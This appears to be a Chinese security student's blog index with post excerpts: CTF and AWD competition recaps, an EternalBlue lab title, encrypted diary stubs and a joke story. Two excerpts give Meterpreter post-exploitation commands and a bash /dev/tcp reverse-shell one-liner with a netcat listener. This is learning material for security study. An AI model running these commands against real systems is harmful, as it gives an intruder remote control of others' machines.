拿到shell后的一条龙套餐
拿到shell后的一条龙套餐参考博客: https://blog.csdn.net/qq_33020901/article/details/98357659
ProjectDer师傅总结的很好,记录一下Orz
0x01.系统命令1)基本系统命令
123456789101112sessions #sessions –h 查看帮助sessions -i <ID值> #进入会话 -k 杀死会话background #将当前会话放置后台run #执行已有的模块,输入run后按两下tab,列出已有的脚本info #查看已有模块信息getuid # 查看权限 getpid # 获取当前进程的pidsysinfo # 查看目标机系统信息ps # 查看当前活跃进程 kill <PID值> 杀死进程idletime #查看目标机闲置时间reboot / shutdown #重启/关机shell #进入目标机cmd shell
2)uictl开关键盘/鼠标
123uictl [enable/disable] [keyboard/mouse/all] ...
几种常见反弹shell汇总
几种常见反弹shell汇总0x01. bash
1.在攻击主机上执行端口监听:
nc -lvvp port //port 为攻击主机端口号,并且此端口号没有被占用
2.在目标主机上执行:
bash -i >& /dev/tcp/攻击主机ip/port 0>&1 //port 为攻击主机端口号
3.解释:
bash -i 打开一个交互的bash
>& 将标准错误输出重定向到标准输出
/dev/tcp/x.x.x.x/port 意为调用socket,建立socket连接,其中x.x.x.x为要反弹到的主机ip,port为端口
0>&1 标准输入重定向到标准输出,实现你与反弹出来的shell的交互
/dev/tcp/ 是Linux中的一个特殊设备,打开这个文件就相当于发出了一个socket调用,建立一个socket连接,读写这个文件就相当于在这个socket连接中传输数据。同理,Linux中还存在/dev/udp/。
其他版本:
exec 5< ...
2021年最后一场比赛-->南通赛场
元旦快乐很巧比赛时间在2021年的最后两天,这篇博客写于新年的第一天,算是对2021年最后一场比赛的总结和对生活的感悟记录。
比赛这次的比赛就不记录复现的过程了,因为这次的比赛与之前的比赛形式很不一样,而将每一步的操作或者一些基本的命令等作为flag,我裂了ORZ,仅仅做了些皮毛下午的AWD更是狠狠地坐牢,算是第一次独立打AWD,加固时期开局15分钟没备份没改密码没源码,开局混战就直接宕机,麻了总结:你所有的悲伤都是由技术不足导致的
感悟在比赛后,看到了很多不同的悲欢离合和相同的生老病死。在医院和列车,看到很多不平凡的平凡人,致敬每一个在疫情期间做服务工作的逆行者。收获的还有很多,说的也只是冰山一角,剩下的就留在心里…
利用永恒之蓝(MS17010)漏洞攻击靶机
ba19d560d983722d9cdeac2a3d28317976a3696a709673177aa67a8c89b171b8b94aac5293304e58dbdc1b6b1a99b64a6326066372aa5bf517a54af2a6fd3bfef82caa476c734448c16e0ea95689cdfd44a081b90be97010cb9eb359a6c7a82cb42e44b7dae9b180849740289fe7c63b7e1e0a614eb90566ff29483df34f401e98fbaae8939e2871c74a00d036138033dbd9fa6f32a2f52aa580f561fcad226f9850f04a9bece5cf19f6072a559354b3b96605bdbbe0416a7718621b99cc3e864e6b7b18932ab2b4d130df24328cca676825cc54c831da1eea0c51114b75f9cb20d50ec56dc52d209eebe657b7023bbb0cb24bfd1984245cf ...
python爬虫学习之路
ba19d560d983722d9cdeac2a3d28317964cef450a8a93b35a09dca9b46d42471f857ab0e33cc71f297be13e34ae0625ed2a0fbc7198880a6a0eb177315da535e3e30081b9239590b077813d04878771e90d9a9b9e6b263f0f28cc39ecf4b7b9eff42002316085f001f17cec82f7fbee31124e850ad28cb397ae1d2609eb507c21121f9efd8367eebfd9291ce0bd515ad300a8b9432bdd45dfee293f428712aa948186f5f9d5a0afb15cb8e917d2ef802672f8cf1ce9eef49d2481e4f618aed986516c96773887f8fa3a0f1dec5c086010d09443035ecf33599de05a89d3cbd3b1aad3e188fdcdcdd5ae34b02d52cc1423162bfc1e2997f6bb ...
日记:我是坏小孩
ba19d560d983722d9cdeac2a3d283179cb026aa1cbd4b7e15d872032ab2c396d3ffed7b79ca15ae116c235aed27b9784b3cff8d5ad210de68f9d3de1cb76f18b938877219b3389fa9535b1f92e11444bf699783595abc9805cb0b81e219d971b3fcfe007a416635ca00697bbe6a6e3bd99dd6af2f6f627bf7741d6a288d6c2c9dec69b939792c3ff221c245b23f3aa22302a5b0e030c54ddcc446e05e586c9cc4f0c1644b84ee38edcf72f8f02c9eba3b361f73e0fd9583f01b1d4904f10cf125097306d49f8ccc01ef8f49fda4a040ac210e8e6b0af96823eb5dae5397c6a5ecf3e7882f9047156b1622f1634e9a4c5713067c3662c4eec8 ...
TCP/IP协议详解
图片来自于师兄Ankio的博客:“https://ankio.net/posts/TCP-IP-Protocol/”TCP/IP协议内容详解,七层的网络通信基础,拿来共勉。
2021苏州网络技术挑战赛
总结:线下赛总体难度还行,web题全部队伍零解,算是一点安慰拿下一道web(感谢hxj)自己攻下一道misc和一道密码(自己还是好菜)这种比赛真爽啊,u1s1。钱多,事少,我爱了,希望多来点这种比赛hh。
日记:一些想说的话
ba19d560d983722d9cdeac2a3d2831799b5619625c1356e8d5f144395f34bae4f89dd91cd843b0092cb5feb46f54a7fba2568a7ea5c0e04ee57c2adbc084db035f0448931bdcaaeaec47630519241937ee7206d116f0f1526424cef4db7cd6dc9221edb7f698a46f29a87bf5fed9f684320e4f7f181da3aaf152a2f7f68da83b
您好,这里需要密码。
张锐离奇失联案
锐频失失连五日,家中皆惧之状,为佣耶,而泡妹子?有勇胤者,先以锐兵之手机电话,电话之首而至彼已关机声。杨允中大帅逼促长群与诸家异报送锐失朕声。胡晏博曰:“信乎?”胤曰:“此朕失之”。锐已不群里吹水亘半月余,微言动上见上榜,不将入学群课程。王永强曰:”此退学要其节奏也。“家中众皆惊,莫敢言,卒锐之所矣,奈何无音,犹须观察。